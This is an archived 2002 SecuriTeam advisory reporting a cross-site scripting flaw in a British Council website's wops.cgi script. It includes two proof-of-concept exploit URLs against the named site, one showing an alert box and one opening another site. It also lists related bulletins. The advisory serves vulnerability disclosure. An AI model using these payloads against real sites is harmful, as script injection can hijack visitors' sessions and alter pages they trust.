[NEWS] Britcoun.org Cross Site Scripting via Wops.cgi

From: support@securiteam.com
Date: 07/12/02

From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 12 Jul 2002 08:09:59 +0200 (CEST)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Britcoun.org Cross Site Scripting via Wops.cgi

SUMMARY

A cross-site scripting vulnerability in the British Council is possible
through the usage of its vulnerable wops.cgi CGI. This vulnerability would
allow attackers to insert malicious content into the web site.

DETAILS

Exploit:
To display a blank message box:
http://www.britcoun.org.il/cgi-bin/wops.cgi?path=>alert()</script>

To open a window to Yahoo.com
http://www.britcoun.org.il/cgi-bin/wops.cgi?path=>window.open('http://www.yahoo.com')</script>

Workaround:
Disable ActiveX/JavaScript.

ADDITIONAL INFORMATION

The information has been provided by p0p t4rtz.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [UNIX] Drupal XSS Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada. ... to promote the most advanced vulnerability assessment solutions today. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] Apache Multiple Space Header DoS (Multi-Threaded Exploit)
    ... The exploit code below is another version of the Apache 2.0.52 DoS ... vulnerability published previously here: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] JBoot Password Bypassing Vulnerability
    ... housewarming rates on automated network vulnerability ... Place any Windows Startup Floppy ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] Suid Application Execution May Give Local Root (Exploit Code)
    ... It is possible for a local user under the FreeBSD operating system to ... For more information about the vulnerability please see: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Texis Sensitive Information Leak
    ... housewarming rates on automated network vulnerability ... The Texis program executes files written in Texis Web Script (a.k.a. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)